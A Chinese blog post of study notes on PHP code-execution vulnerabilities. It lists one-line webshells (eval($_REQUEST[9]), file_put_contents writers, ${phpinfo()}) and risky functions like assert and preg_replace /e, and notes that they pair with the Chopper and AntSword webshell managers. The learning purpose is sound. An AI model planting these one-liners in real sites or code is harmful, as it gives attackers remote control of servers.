学习:渗透之代码执行漏洞

本文详细解释了代码执行漏洞,涉及如何通过用户输入将数据作为后端代码执行,如eval、assert、file_put_contents等函数的利用,以及PHP中双引号二次解析的新威胁。讨论了这些漏洞如何与攻击工具如菜刀、蚁剑结合,警示安全风险。
摘要由CSDN通过智能技术生成

代码执行漏洞是什么:

  • 用户输入的数据被当作后端代码进行执行

典型的语句

  • <?php eval($_REQUEST[9])?>
  • <?php $_GET[1]($_GET[2])?>
  • <?=eval($_REQUEST[9])?>
  • <?php ${file_put_contents($_GET[1],$_GET[2])}?>

会造成代码执行的函数:

  • eval($a)
eval($_REQUEST[9]);

在这里插入图片描述

  • assert($a)
assert($_REQUEST[9]);
assert("eval('$_REQUEST[9]')")
file_put_contents('1.php','<?php echo 1;echo 2;?>')

在这里插入图片描述
在这里插入图片描述

  • preg_replace()
<?php
echo preg_replace('/a/e',$_GET[9],'ac');
?>

在这里插入图片描述

  • create_function()
$a=create_function('',$_REQUEST[9]); 

在这里插入图片描述

  • array_map()
array_map('assert',$_GET);

在这里插入图片描述

在这里插入图片描述

  • call_user_func()
  • 双引号二次解析(php5.5.38及以上版本)
"${phpinfo()}";

在这里插入图片描述
双引号二次解析需配合文件写入使用

总结:

以上即可连接菜刀、蚁剑使用

  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值